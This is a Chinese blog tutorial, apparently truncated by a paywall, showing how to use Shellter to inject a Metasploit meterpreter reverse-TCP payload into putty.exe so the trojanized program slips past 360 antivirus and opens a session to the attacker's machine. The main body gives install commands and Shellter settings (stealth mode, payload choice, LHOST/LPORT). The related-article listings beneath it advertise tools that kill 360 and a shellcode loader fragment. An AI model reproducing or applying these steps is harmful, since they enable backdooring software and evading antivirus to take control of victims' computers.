MSF配合shellter实现360免杀

最新推荐文章于 2022-10-04 20:01:05 发布
原创 最新推荐文章于 2022-10-04 20:01:05 发布 · 1.1k 阅读 · 9 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文介绍如何使用Shellter工具将MSF生成的木马与正常程序捆绑,实现对360杀毒软件的绕过,建立会话控制服务器。详细步骤包括下载与运行Shellter,选择目标文件并设置payload参数,最后通过捆绑后的程序在目标系统上建立免杀会话。

利用shellter工具将MSF生成的木马文件与其他文件捆绑在一起,达到绕过杀毒软件建立会话控制服务器的目的。本次的绕过的杀毒软件为360。

攻击/kali/192.168.1.7
靶机/win7/

一、运行shellter工具

①下载shellter:

apt-get install shellter

②安装Windows运行环境(等待时间稍长)

dpkg --add-architecture i386 && apt-get update && apt-get install wine32

在这里插入图片描述
③运行shellter

在这里插入图片描述

choose operation mode - auto/manual: a  #自动模式
pe target>/root/putty.exe         		#选择要注入的文件程序
enable stealth mode?>y               	#健康模式
use a listed payload or custom>l    	#选择列表
set payload by index>1      #调用meterpreter_reverse_TCP模块
set lhost:192.168.1.7
set lport:1155

最低0.47元/天 解锁文章
谨防钓鱼(二)——msf搭档shellter轻松控制目标电脑
tempulcc的博客
09-15 522
metaspolit配合shellter渗透windows
【红队利器】单文件一键Kill360
4SecNet团队专栏
03-18 1236
在安全研究和渗透测试过程中,国内毒软件(如 360 安全卫士、360 毒)通常会成为绕过的主要障碍。360 系列产品具有强大的自保护机制。为了研究 360 的自保护机制,以及探讨如何在实际攻防场景中绕过安全软件干扰,本研究设计了一种单文件解决方案,旨在 一键终止 360 的核心组件,使其无法继续运行。
干掉 360驱动程序
03-31
使用驱动程序干掉 360,不要用来干坏事呀,否则与我无关,呵呵
网络安全进阶篇之(十四章-9)MSF加密壳360
划水的小白白
06-01 867
文章目录一、 概念1.1 360 安全卫士和 360 毒二、前期准备2.1 下载地址三、具体过程3.1 使用MSF生成木马并监听3.2 过程3.3 测试 一、 概念 1.1 360 安全卫士和 360 360 毒是 360 安全中心出品的一款费的云安全毒软件。 它创新性地整合了五大领先查引擎,包括国际知名的 BitDefender 病毒查引擎、 Avira(小红伞)病毒查引擎、360 云查引擎、 360 主动防御引擎以及 360 第二代 QVM 人工智能引擎。 二、前期准备
360安全卫士
qq_43647462的博客
11-15 943
绕过360安全卫士(无法绕过火绒) Buchiyexiao #include <windows.h> #include <stdio.h> #pragma comment(linker,"/subsystem:\"windows\" /entry:\"mainCRTStartup\"")//不显示窗口 unsigned char shellcode[] = "veil_shellcode"; void main() { LPVOID Memory = VirtualAlloc
全套教程+工具合集
08-25
远控专题(7)-Shellter(VT率7-69).pdf 元控专题(8)-BackDoor-Factory(VT率13-71).pdf 远控专题(9)-Avet(VT率17-71).pdf 远控专题(10)-TheFatRat(VT率22-70).pdf 元...
ShellCode-Loader - Msf&CobaltStrikeShellCode加载器
11-19
ShellCode-Loader是一个通过Msf(Metasploit Framework)和Cobalt Strike进行ShellCode加载的工具。Metasploit是一个用于渗透测试和安全研究的平台,它提供了用于发现安全漏洞并开发exploit代码的工具。Cobalt ...
kali工具shellter
scholar_1的博客
08-06 4908
工具安装完成后再/usr/share/windows-resources/shellter 这个文件夹shellter目录下的Shellter_Backups文件夹是你注入文件后备份的文件夹,会自动把原文件备份一个到这个文件夹下。Choose Operation Mode - Auto/Manual (A/M/H):A //A:自动模式自动注入后门,M:高级模式,H:帮助。(Y/N/H): Y //是否启用隐身模式 Y:启用 N:不启用 H:帮助。...
方法(九)msf加密壳
qq_56426046的博客
10-04 678
仅供安全研究与学习之用,若将工具做其他用途,由使用者承担全部法律及连带责任,作者不承担任何法律及连带责任。
360壳,
06-11
360壳过360云查。主动一切防御提示
最新360
12-17
最新360云查
360源码
03-03
ff专业超级远程控制。超强的管理功能,适用于电脑爱好者、家庭、学校、公司、单位远程管理计算机! --------------- 其它应用就不要我多说了吧~呵呵
利用360软件设置的360终极.绝对过360
11-19
哼哼,研究了半年终于弄出了个利用360内部程序做的360.百分之百过360.... 希望大家采纳!!!!!
最新360全套,无提示上线,世界毒网!!
12-18
最新360全套
一键360四引擎
11-19
360360360360360360360360360360360360360360360360360360360360360
网络安全进阶篇之(十四章-3) MSF用加载器360
划水的小白白
05-20 765
文章目录一、 概念1.1 360 安全卫士和 360 毒1.2 MSF二、 前期准备2.1 加载器下载地址三、具体过程3.1 编译main文件3.2 3.3 测试效果 一、 概念 1.1 360 安全卫士和 360 360 毒是 360 安全中心出品的一款费的云安全毒软件。 它创新性地整合了五大领先查引擎,包括国际知名的 BitDefender 病毒查引擎、 Avira(小红伞)病毒查引擎、360 云查引擎、360 主动防御引擎以及 360 第二代 QVM 人工智能引擎。 1
红队技巧-C++源码MSF 360 火绒双
moonteam的博客
04-24 1063
C++源码MSF 360 火绒双 作者小苏 1.本次简介: 主语言C++,WIN32编程,内存注入。 2.前置知识: 因为本人只会C/C++,也就顺路搞了下c的,需要的知识: C/C++语言,WIN32编程,MFC基础,汇编语言,能思考的大脑。主要就是WIN32API这块,那么多函数有时间随便找找冷门函数也了。 本文更多做大体的讲解,代码就放在那,会不会学是自己事。没有编程功底的看起来会吃力希望你看完后不忘初心能坚持学习技术,为了找工作也好,为了提升自己也好,遇到困难会永远.
360笔记
司徒荆的博客
06-22 115
1、360---BD引擎 (1)360-Bd把特征码定位在版权部分 (2)360-Bd把字符串定位在字符串内面 (3)360-Bd吧特特征码定位在资源位置(版权,图标,图片之类的) 2、360-QVM引擎 (1)定位比较麻烦 (2)定位到OLEAUT32.dll,修改时候,延时加载 #pragma comment (linker,"/DELAYLOAD:OLEAUT32.dll");...
shellcode之360安全卫士(shecodject)(一)
ZPFCD的博客
07-16 999
shellcode
360
最新发布
12-04
这些引用主要讨论了使用Cobal Strike360MSF加载器、利用VC++编译环境制作木马等方法。从中可以梳理出几个技术要点:使用编码器混淆payload、利用加载器分离技术、修改编译器设置、使用特定编译环境...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值